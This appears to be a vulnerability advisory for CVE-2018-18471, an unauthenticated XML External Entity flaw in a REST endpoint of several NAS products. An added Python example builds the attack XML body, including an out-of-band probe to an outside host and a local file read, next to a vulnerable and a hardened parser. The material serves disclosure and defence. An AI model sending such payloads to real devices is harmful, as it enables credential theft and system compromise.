Privilege escalation in NETGEAR products - CVE-2018-18471
Published: October 22, 2018 / Updated: October 22, 2018
Vulnerability identifier: #VU15459
CSH Severity: High
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:U/U:Amber
CVE-ID: CVE-2018-18471
CWE-ID: CWE-611
Exploitation vector: Remote access
Exploit availability:
No public exploit available
Vendor: Seagate
Medion
NETGEAR
Affected software:
Seagate GoFlex Home
Medion LifeCloud NAS
Netgear Stora
Detailed vulnerability description
The vulnerability allows a remote attacker to compromise the vulnerable system.
The weakness exists because most of the API endpoints and the web interface are accessible without authentication. One of the REST API endpoints, /api/2.0/rest/aggregator/xml, loads XML supplied in the POST body and parses it with external entity resolution enabled (XML External Entity injection, CWE-611). A remote attacker can craft the XML so that the parser makes an outbound request to an attacker-chosen host (the proof of concept requests the file XXE_CHECK from 192.168.56.1) or reads local files, disclosing usernames and passwords. The attacker can then cause the daemon to skip over junk data until it finds the expected string (as shown in the IDA snippet in the original research, not reproduced here), inject arbitrary commands, and execute arbitrary code with root privileges.
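As an added example (not code from this advisory or from the affected NAS firmware), the following Python models the XXE half of the issue: a builder for the XML body an unauthenticated attacker would POST to the aggregator endpoint, a deliberately vulnerable parser that dereferences SYSTEM entities the way the endpoint is described to, and a hardened parser that refuses any DOCTYPE. Only the endpoint path and the 192.168.56.1/XXE_CHECK probe come from the advisory; the parser functions, demo() and the sample secret file are hypothetical. The vulnerable parser resolves only file: targets so that the example runs offline; a server that resolves external entities would fetch an http: target such as the XXE_CHECK probe in exactly the same way.

```python
"""XXE demonstration modelled on the /api/2.0/rest/aggregator/xml issue.

Added example: not code from the advisory or from the affected NAS firmware.
Only AGGREGATOR_ENDPOINT and XXE_CHECK_PROBE come from the advisory; the parser
functions and the sample data below are hypothetical stand-ins.
"""
import os
import pathlib
import tempfile
import urllib.parse
import xml.parsers.expat as expat

AGGREGATOR_ENDPOINT = "/api/2.0/rest/aggregator/xml"  # from the advisory
XXE_CHECK_PROBE = "http://192.168.56.1/XXE_CHECK"     # out-of-band probe from the advisory


def build_xxe_payload(system_id: str) -> bytes:
    """Build the kind of XML body an unauthenticated attacker POSTs to the endpoint.

    system_id is the external entity target: an http: URL forces the parser to
    make an outbound request (SSRF / out-of-band check); a file: URL makes it
    inline local file contents (credential disclosure) into the parsed document.
    """
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE aggregator [\n"
        f'  <!ENTITY xxe SYSTEM "{system_id}">\n'
        "]>\n"
        "<aggregator><item>&xxe;</item></aggregator>"
    ).encode()


def parse_vulnerable(body: bytes) -> str:
    """Hypothetical parser behaving like the vulnerable endpoint: it dereferences
    SYSTEM entities and returns the text they expand to.
    Only file: targets are resolved here so the example runs offline."""
    chunks = []
    parser = expat.ParserCreate()

    def external_entity_ref(context, base, system_id, public_id):
        url = urllib.parse.urlparse(system_id)
        path = url.path if url.scheme == "file" else system_id
        # Sub-parser for the entity content; its character data lands in `chunks`.
        sub = parser.ExternalEntityParserCreate(context)
        sub.CharacterDataHandler = chunks.append
        with open(path, "rb") as fh:
            sub.Parse(fh.read(), True)
        return 1  # non-zero tells expat the entity was handled

    parser.CharacterDataHandler = chunks.append
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.Parse(body, True)
    return "".join(chunks)


def parse_hardened(body: bytes) -> str:
    """Hardened version: refuse any DOCTYPE (so no entity can be declared) and
    install no ExternalEntityRefHandler (so nothing is fetched even if one were)."""
    chunks = []
    parser = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE is not allowed in aggregator request bodies")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(body, True)
    return "".join(chunks)


def demo() -> dict:
    """Run both parsers over a payload aimed at a constructed local secret file."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "passwd")   # constructed stand-in for a credentials file
        with open(secret, "w") as fh:
            fh.write("admin:s3cret\n")         # constructed sample content
        payload = build_xxe_payload(pathlib.Path(secret).as_uri())
        leaked = parse_vulnerable(payload)
        try:
            parse_hardened(payload)
            rejected = False
        except ValueError:
            rejected = True
    return {"leaked": leaked, "hardened_rejected": rejected}


if __name__ == "__main__":
    print("POST", AGGREGATOR_ENDPOINT)
    print(build_xxe_payload(XXE_CHECK_PROBE).decode())
    print(demo())
```

The hardened parser applies two independent controls: rejecting the DOCTYPE stops an attacker from declaring any entity at all, and leaving ExternalEntityRefHandler unset means expat has no code path that could fetch a SYSTEM identifier even if a DTD slipped through. Either on its own would have prevented the out-of-band XXE_CHECK request and the file read; the authentication gap on the endpoint is a separate fix.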
How to mitigate CVE-2018-18471
Cybersecurity Help is currently unaware of any solutions addressing the vulnerability.